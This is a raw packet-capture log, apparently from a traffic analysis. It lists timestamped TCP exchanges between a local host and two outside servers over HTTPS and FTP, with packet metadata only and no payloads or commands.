                                                        Sep 27, 2024 10:43:23.882664919 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.882698059 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.882817984 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.883016109 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.883085966 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.883121967 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.883172989 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.883191109 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.883197069 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.883225918 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.883261919 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.883950949 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.884130955 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.901690960 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.901915073 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.968841076 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.968980074 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969000101 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969013929 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969047070 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969106913 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969122887 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969183922 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969327927 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969532013 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969604969 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969716072 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.969727039 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.969784021 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.970145941 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.970201969 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.970432997 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.970493078 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.970597029 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.970668077 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.970963001 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971044064 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971075058 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971082926 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971096039 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971148968 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971674919 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971760035 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971788883 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971796036 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971824884 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971839905 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971863985 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971869946 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971895933 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971898079 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971925974 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.971931934 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.971967936 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.972014904 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.972341061 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.972341061 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.990420103 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.990708113 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.057492971 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.057573080 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.057717085 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.057751894 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.057760954 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.057897091 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.058015108 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.058103085 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.058265924 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.058345079 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.058654070 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.058712959 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.058720112 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.058868885 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.059025049 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.059082985 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.059403896 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.059469938 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.059487104 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.059545040 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.059926033 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.060033083 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.060125113 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.060185909 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.060193062 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.060229063 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.060257912 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.060264111 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.060300112 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.060976982 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.061022997 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.061058044 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.061064959 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.061078072 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.061111927 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.079010010 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.079361916 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.146126986 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.146303892 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.146327019 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.146339893 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.146358967 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.146600962 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.146672010 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.146754980 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.146966934 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147057056 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.147245884 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147305965 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.147313118 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147325993 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147361994 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147376060 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.147388935 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.147420883 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.147440910 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.147932053 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.148003101 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.148010969 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.148067951 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.148530960 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.148585081 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.148608923 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.148616076 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.148634911 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.148699045 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.148987055 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.149056911 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.149108887 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.149243116 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.149975061 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.150039911 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.150051117 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.150054932 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.150094986 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.150131941 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.167371988 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.167455912 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.234548092 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.234690905 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.234776974 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.234946966 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.235004902 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.235116005 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.235356092 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.235440016 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.235532045 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.235594988 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.235773087 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.235836029 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.236028910 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.236084938 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.236358881 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.236418962 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.236427069 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.236494064 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.236840963 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.236896038 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.237142086 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.237232924 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.237273932 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.237338066 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.237348080 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.237436056 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.237884998 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.237977982 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.238042116 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.238101006 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.255889893 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.256088018 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.323164940 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.323244095 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.323405981 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.323405981 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.323426962 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.323473930 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.323590040 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.323685884 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.323775053 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.323841095 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.324032068 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.324121952 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.324301004 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.324361086 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.324623108 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.324702024 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.324708939 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.324839115 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.325054884 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.325119019 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.325402975 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.325469017 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.325475931 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.325557947 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.325957060 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.326018095 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.326026917 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.326097965 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.326364994 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.326456070 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.326541901 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.326606035 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.326618910 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.326711893 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.344533920 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.344604015 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:24.344630957 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.344847918 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:24.352941990 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:37.019808054 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:37.024851084 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:37.024928093 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:37.644287109 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:37.644542933 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:37.649394035 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:37.869940042 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:37.870100975 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:37.875080109 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.161242962 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.161375046 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:38.166168928 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.386324883 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.386569977 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:38.391402006 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.611373901 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.632256031 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:38.637098074 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.857228041 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:38.860129118 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:38.865056038 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.085021973 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.085927963 CEST4970855987192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.090823889 CEST55987497085.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.090892076 CEST4970855987192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.090953112 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.095746040 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.726114988 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.726339102 CEST4970855987192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.726399899 CEST4970855987192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.732899904 CEST55987497085.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.733198881 CEST55987497085.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:39.733257055 CEST4970855987192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.768673897 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:39.952034950 CEST21497055.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:43:40.003046036 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:43:45.669833899 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:45.669878960 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:45.669975042 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:45.674549103 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:45.674563885 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.180098057 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.180186033 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.182774067 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.182789087 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.183099985 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.237391949 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.257880926 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.299403906 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.378309011 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.378338099 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.378345013 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.378362894 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.378431082 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.378460884 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.399835110 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.399993896 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.400043011 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.440537930 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.466960907 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.466976881 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.467005014 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.467051029 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.467117071 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.468198061 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.468208075 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.468264103 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.469264984 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.469274044 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.469333887 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.488336086 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.488348007 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.488423109 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.555547953 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.555560112 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.555656910 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.556010962 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.556019068 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.556080103 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.556804895 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.556883097 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.557049990 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.557112932 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.557933092 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.558011055 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.558764935 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.558832884 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.559693098 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.559788942 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.577147961 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.577230930 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.644129038 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.644316912 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.644531012 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.644620895 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.644857883 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.644915104 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.645231962 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.645289898 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.645404100 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.645462990 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.646074057 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.646136045 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.646519899 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.646583080 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.647047997 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.647108078 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.647214890 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.647277117 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.648005962 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.648067951 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.648197889 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.648257017 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.648890018 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.648950100 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.649111032 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.649169922 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.665769100 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.665894032 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.665918112 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.665930986 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.665971994 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.733004093 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.733175993 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.733225107 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.733257055 CEST4435207367.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:46.733289003 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.733299971 CEST52073443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:46.733402967 CEST4435207367.212.175.162192.168.2.5
